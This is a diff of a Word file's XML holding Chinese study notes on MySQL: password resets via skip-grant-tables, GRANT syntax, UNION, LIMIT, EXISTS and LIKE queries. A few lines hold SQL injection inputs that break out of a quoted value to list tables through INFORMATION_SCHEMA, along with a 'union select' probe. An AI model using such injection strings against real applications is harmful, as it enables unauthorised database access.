-      <w:r>
-        <w:t>old_password()</w:t>
-      </w:r>
-      <w:r>
-        <w:t>使用的是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>Mysql323</w:t>
-      </w:r>
-      <w:r>
-        <w:t>加密：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>update mysql.user set password='newpassword' where user='username'  update</w:t>
-      </w:r>
-      <w:r>
-        <w:t>语句不支持对多个字段的友好修改</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>如果我们忘记了</w:t>
-      </w:r>
-      <w:r>
-        <w:t>root</w:t>
-      </w:r>
-      <w:r>
-        <w:t>密码，可以在</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/etc/my.cnf</w:t>
-      </w:r>
-      <w:r>
-        <w:t>中</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>[msqld]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>skip-grant-tables</w:t>
-      </w:r>
-      <w:r>
-        <w:t>来登录进去再修改密码</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> #grant</w:t>
-      </w:r>
-      <w:r>
-        <w:t>授予</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>以命令行参数启动</w:t>
-      </w:r>
-      <w:r>
-        <w:t>mysql</w:t>
-      </w:r>
-      <w:r>
         <w:t>：</w:t>
       </w:r>
       <w:r>
-        <w:t>/usr/bi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n/mysqld_safe --skip-grant-tables &amp;</w:t>
+        <w:t>/usr/bin/mysqld_safe --skip-grant-tables &amp;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8899,19 +8351,13 @@
         <w:t>union</w:t>
       </w:r>
       <w:r>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:t>集合</w:t>
+        <w:t>（集合</w:t>
       </w:r>
       <w:r>
         <w:t>1</w:t>
       </w:r>
       <w:r>
-        <w:t>：字</w:t>
-      </w:r>
-      <w:r>
-        <w:t>段名为</w:t>
+        <w:t>：字段名为</w:t>
       </w:r>
       <w:r>
         <w:t>a,b,c,d</w:t>
@@ -8973,10 +8419,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">ERROR 1222 (21000): The used SELECT statements have a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>different number of columns</w:t>
+        <w:t>ERROR 1222 (21000): The used SELECT statements have a different number of columns</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9043,10 +8486,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">2 rows in set (0.05 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>sec)</w:t>
+        <w:t>2 rows in set (0.05 sec)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -9103,10 +8543,7 @@
         <w:t>设置</w:t>
       </w:r>
       <w:r>
-        <w:t>unique</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> key</w:t>
+        <w:t>unique key</w:t>
       </w:r>
       <w:r>
         <w:t>再</w:t>
@@ -9309,10 +8746,7 @@
         <w:t>LOGIN</w:t>
       </w:r>
       <w:r>
-        <w:t>权限的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>角色，下面两条语句在权限上完全等价：</w:t>
+        <w:t>权限的角色，下面两条语句在权限上完全等价：</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9372,10 +8806,7 @@
         <w:t>用户</w:t>
       </w:r>
       <w:r>
-        <w:t>&gt; [WITH] [DBA|RESOURCE|CONNECT];  RES</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">OURCE </w:t>
+        <w:t xml:space="preserve">&gt; [WITH] [DBA|RESOURCE|CONNECT];  RESOURCE </w:t>
       </w:r>
       <w:r>
         <w:t>不能创建用户和模式，可以创建表等对象</w:t>
@@ -9483,10 +8914,7 @@
         <w:t>&gt; &lt;</w:t>
       </w:r>
       <w:r>
-        <w:t>对象</w:t>
-      </w:r>
-      <w:r>
-        <w:t>名</w:t>
+        <w:t>对象名</w:t>
       </w:r>
       <w:r>
         <w:t>&gt;]…</w:t>
@@ -9606,10 +9034,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>| Grants for guest@l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ocalhost                                                                                   |</w:t>
+        <w:t>| Grants for guest@localhost                                                                                   |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9628,10 +9053,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> TO 'guest'@'localhost' IDENTI</w:t>
-      </w:r>
-      <w:r>
-        <w:t>FIED BY PASSWORD '*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9' |</w:t>
+        <w:t xml:space="preserve"> TO 'guest'@'localhost' IDENTIFIED BY PASSWORD '*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9' |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9657,10 +9079,7 @@
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t xml:space="preserve">pe_scan` TO 'guest'@'localhost'            </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                               |</w:t>
+        <w:t>pe_scan` TO 'guest'@'localhost'                                           |</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9678,10 +9097,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>+-------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-      <w:r>
-        <w:t>-+</w:t>
+        <w:t>+--------------------------------------------------------------------------------------------------------------+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9755,10 +9171,7 @@
         <w:t>对象类型</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">&gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:t>&lt;</w:t>
+        <w:t>&gt; &lt;</w:t>
       </w:r>
       <w:r>
         <w:t>对象名</w:t>
@@ -9970,10 +9383,7 @@
         <w:t>/</w:t>
       </w:r>
       <w:r>
-        <w:t>取消于用户。数据对象的安全标记设置是在创建</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的时候，比如说字段的创建语句里面加上了</w:t>
+        <w:t>取消于用户。数据对象的安全标记设置是在创建的时候，比如说字段的创建语句里面加上了</w:t>
       </w:r>
       <w:r>
         <w:t>with xxxLabel</w:t>
@@ -10053,10 +9463,7 @@
         <w:t xml:space="preserve">max_connect_errors  </w:t>
       </w:r>
       <w:r>
-        <w:t>限制登</w:t>
-      </w:r>
-      <w:r>
-        <w:t>录失败次数</w:t>
+        <w:t>限制登录失败次数</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10118,10 +9525,7 @@
         <w:t>一个是</w:t>
       </w:r>
       <w:r>
-        <w:t>127.0.0.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>1</w:t>
+        <w:t>127.0.0.1</w:t>
       </w:r>
       <w:r>
         <w:t>，本地登录上去的</w:t>
@@ -10234,10 +9638,7 @@
         <w:t xml:space="preserve">select name,identity from student where class_num='153040102' or class_num='153040101'; </w:t>
       </w:r>
       <w:r>
-        <w:t>表名字之间的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>逗号前往不能丢</w:t>
+        <w:t>表名字之间的逗号前往不能丢</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10285,10 +9686,7 @@
         <w:t xml:space="preserve"> select count(*) from jwc.teacher where '1'='1' union select count(*) from jwc.student limit 10;</w:t>
       </w:r>
       <w:r>
-        <w:t>联合查询要求输出的字段数目是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>一样的。</w:t>
+        <w:t>联合查询要求输出的字段数目是一样的。</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10337,10 +9735,7 @@
         <w:t>使用</w:t>
       </w:r>
       <w:r>
-        <w:t>abc', (SELECT table_na</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">me FROM INFORMATION_SCHEMA.TABLES limit 1), 'xxb') --   </w:t>
+        <w:t xml:space="preserve">abc', (SELECT table_name FROM INFORMATION_SCHEMA.TABLES limit 1), 'xxb') --   </w:t>
       </w:r>
       <w:r>
         <w:t>尝试查看本数据库中有什么表</w:t>
@@ -10353,10 +9748,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>abc', (SELECT table_name FROM INFORMATION_SCHEMA.TABLES where table_name not in ('post'</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, 'user') order by CREATE_TIME limit 1), 'xxb') --  </w:t>
+        <w:t xml:space="preserve">abc', (SELECT table_name FROM INFORMATION_SCHEMA.TABLES where table_name not in ('post', 'user') order by CREATE_TIME limit 1), 'xxb') --  </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10379,1045 +9771,1018 @@
       <w:r>
         <w:t>CREATE TABLE myCity LIKE City</w:t>
       </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>update exam set answer='</w:t>
-      </w:r>
-      <w:r>
-        <w:t>五指分开</w:t>
-      </w:r>
-      <w:r>
-        <w:t>',A=0,B=1 where question='</w:t>
-      </w:r>
-      <w:r>
-        <w:t>单选题：发上手飘球时，击球的时候应（</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>）。</w:t>
-      </w:r>
-      <w:r>
-        <w:t>';</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select * from table limit </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>m,n</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>SELECT * FROM route LIMIT 10</w:t>
-      </w:r>
-      <w:r>
-        <w:t>查询前</w:t>
-      </w:r>
-      <w:r>
-        <w:t>10</w:t>
-      </w:r>
-      <w:r>
-        <w:t>条（</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">&lt;=&gt;0,10 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>表示从第一条记录开始的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>10</w:t>
-      </w:r>
-      <w:r>
-        <w:t>条记录。注意这里数数是从</w:t>
-      </w:r>
-      <w:r>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:t>开始。所以就能使用程序</w:t>
-      </w:r>
-      <w:r>
-        <w:t>0,20   20,40  40,60</w:t>
-      </w:r>
-      <w:r>
-        <w:t>这样）</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>order/group by</w:t>
-      </w:r>
-      <w:r>
-        <w:t>加上要排序的字段</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">group by </w:t>
-      </w:r>
-      <w:r>
-        <w:t>是排序以后同值合并，而不是分组。常用于对消费记录表进行统计</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Customer,SUM(OrderPrice) FROM Orders GROUP BY Customer</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>不够</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">group by </w:t>
-      </w:r>
-      <w:r>
-        <w:t>与</w:t>
-      </w:r>
-      <w:r>
-        <w:t>GROUP_CONCAT</w:t>
-      </w:r>
-      <w:r>
-        <w:t>共同使用就是很好的分组显示，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>SELECT sex,GROUP_CONCAT(name) FROM employee GROUP BY sex;</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>select * from birth order by birthday limit 3 where birthday&gt;311</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>order by</w:t>
-      </w:r>
-      <w:r>
-        <w:t>与</w:t>
-      </w:r>
-      <w:r>
-        <w:t>limit</w:t>
-      </w:r>
-      <w:r>
-        <w:t>必须要是在最后面</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>insert into te</w:t>
-      </w:r>
-      <w:r>
-        <w:t>st set birthday=2 where name ='</w:t>
-      </w:r>
-      <w:r>
-        <w:t>转存表</w:t>
-      </w:r>
-      <w:r>
-        <w:t>';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>如果这个</w:t>
-      </w:r>
-      <w:r>
-        <w:t>name</w:t>
-      </w:r>
-      <w:r>
-        <w:t>已经存在就会报错，这条语句不能起到</w:t>
-      </w:r>
-      <w:r>
-        <w:t>update</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的作用。</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>我在想会不会有人开着数据库的端口，而且密码还是默认的空？！</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select * </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的时候越下面的记录越是最近插进去的</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>predicate:</w:t>
-      </w:r>
-      <w:r>
-        <w:t>判定条件</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>in</w:t>
-      </w:r>
-      <w:r>
-        <w:t>引导的子句只能返回一个字段</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">exists </w:t>
-      </w:r>
-      <w:r>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">sql </w:t>
-      </w:r>
-      <w:r>
-        <w:t>返回结果集为真）</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>而不管结果集返回的是什么。与</w:t>
-      </w:r>
-      <w:r>
-        <w:t>IN</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的区别是可以返回一个结果集</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">not exists (sql </w:t>
-      </w:r>
-      <w:r>
-        <w:t>不返回结果集为真）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">SELECT ID,NAME </w:t>
-      </w:r>
-      <w:r>
-        <w:t>FROM A</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">　</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> WHERE</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">　</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ID IN (SELECT AID FROM B) </w:t>
-      </w:r>
-      <w:r>
-        <w:t>《</w:t>
-      </w:r>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>》</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID) </w:t>
-      </w:r>
-      <w:r>
-        <w:t>配合连接子查询</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>据说</w:t>
-      </w:r>
-      <w:r>
-        <w:t>exists</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的效率查找起来比</w:t>
-      </w:r>
-      <w:r>
-        <w:t>in</w:t>
-      </w:r>
-      <w:r>
-        <w:t>好，应该是不会执行索引的原因</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>下面是对</w:t>
-      </w:r>
-      <w:r>
-        <w:t>exists</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的理解：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>表</w:t>
-      </w:r>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">ID NAME </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>1   A1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>2   A2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>3   A3</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>表</w:t>
-      </w:r>
-      <w:r>
-        <w:t>B</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>ID AID NAME</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>1   1     B1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">2   2     B2 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>3   2     B3</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>表</w:t>
-      </w:r>
-      <w:r>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:t>和表</w:t>
-      </w:r>
-      <w:r>
-        <w:t>B</w:t>
-      </w:r>
-      <w:r>
-        <w:t>是１对多的关系</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> A.ID =&gt; B.AID</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ID,NAME</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>执行结果为</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>1 A1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>2 A2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>原因可以按照如下分析</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>１</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>１有值返</w:t>
-      </w:r>
-      <w:r>
-        <w:t>回真所以有数据</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ID,NAME</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>２有值返回真所以有数据</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ID,NAME</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=3)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>３无值返回真所以没有数据</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>查询：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>1.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>在查询结果中显示列名：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>a.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>用</w:t>
-      </w:r>
-      <w:r>
-        <w:t>as</w:t>
-      </w:r>
-      <w:r>
-        <w:t>关键字：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select name as ’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>姓名</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’from students order by age</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>b.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>直接表示：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select name ’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>姓名</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’from students order by age</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>精确查找</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>a.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>用</w:t>
-      </w:r>
-      <w:r>
-        <w:t>in</w:t>
-      </w:r>
-      <w:r>
-        <w:t>限定范围：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select * from students where native in (’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>湖南</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’, ’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>四川</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>b.between...and</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select * from students where age between 20 and 30</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>c.“</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=”</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">select * </w:t>
-      </w:r>
-      <w:r>
-        <w:t>from students where name = ’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李山</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>d.like:select * from students where name like ’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李</w:t>
-      </w:r>
-      <w:r>
-        <w:t>%’(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>注意查询条件中有</w:t>
-      </w:r>
-      <w:r>
-        <w:t>“%”</w:t>
-      </w:r>
-      <w:r>
-        <w:t>，则说明是部分匹配，而且还有先后信息在里面，即查找以</w:t>
-      </w:r>
-      <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李</w:t>
-      </w:r>
-      <w:r>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:t>开头的匹配项。所以若查询有</w:t>
-      </w:r>
-      <w:r>
-        <w:t>“</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李</w:t>
-      </w:r>
-      <w:r>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的所有对象，应该命令：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’%</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李</w:t>
-      </w:r>
-      <w:r>
-        <w:t>%’;</w:t>
-      </w:r>
-      <w:r>
-        <w:t>若是第二个字为李，则应为</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’_</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李</w:t>
-      </w:r>
-      <w:r>
-        <w:t>%’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>或</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’_</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>或</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’_</w:t>
-      </w:r>
-      <w:r>
-        <w:t>李</w:t>
-      </w:r>
-      <w:r>
-        <w:t>_’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
-      </w:r>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>e.[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>]</w:t>
-      </w:r>
-      <w:r>
-        <w:t>匹配检查符：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select * from courses where cno like ’[AC]%’(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>表示或的关系，与</w:t>
-      </w:r>
-      <w:r>
-        <w:t>"in(..</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.)"</w:t>
-      </w:r>
-      <w:r>
-        <w:t>类似，而且</w:t>
-      </w:r>
-      <w:r>
-        <w:t>"[]"</w:t>
-      </w:r>
-      <w:r>
-        <w:t>可以表示范围，如：</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select * from courses where cno like ’[A-C]%’)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>对于时间类型变量的处理</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>a.smalldatetime</w:t>
-      </w:r>
-      <w:r>
-        <w:t>：直接按照字符串处理的方式进行处理，例如：</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">select * from students where birth &gt; = ’1980-1-1’and birth &lt;= </w:t>
-      </w:r>
-      <w:r>
-        <w:t>’1980-12-31’</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。不过我是采用了数字型的判断，如果日期采用字符串型的判断就需要将同一长度，就像身份证中间那样。</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>默认情况下一个用户对应一个集合，用户的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>schema</w:t>
-      </w:r>
-      <w:r>
-        <w:t>名等于用户名，并作为该用户缺省</w:t>
-      </w:r>
-      <w:r>
-        <w:t>schema</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。所以</w:t>
-      </w:r>
-      <w:r>
-        <w:t>schema</w:t>
-      </w:r>
-      <w:r>
-        <w:t>集合看上去像用户名。我们访问一个表时，没有指明该表属于哪一个</w:t>
-      </w:r>
-      <w:r>
-        <w:t>schema</w:t>
-      </w:r>
-      <w:r>
-        <w:t>中的，系统就会自动给我们在表上加上缺省的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>shema</w:t>
-      </w:r>
-      <w:r>
-        <w:t>名。这一点</w:t>
-      </w:r>
-      <w:r>
-        <w:t>postgres</w:t>
-      </w:r>
-      <w:r>
-        <w:t>中可以体会到。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>模式的定义</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">CREATE SCHEMA schemaname [ AUTHORIZATION </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>username</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> [ schema_element [ ... ] </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">CREATE SCHEMA AUTHORIZATION username [ schema_element [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>... ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">DROP SCHEMA name [, ...] [ CASCADE | </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>RESTRICT ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
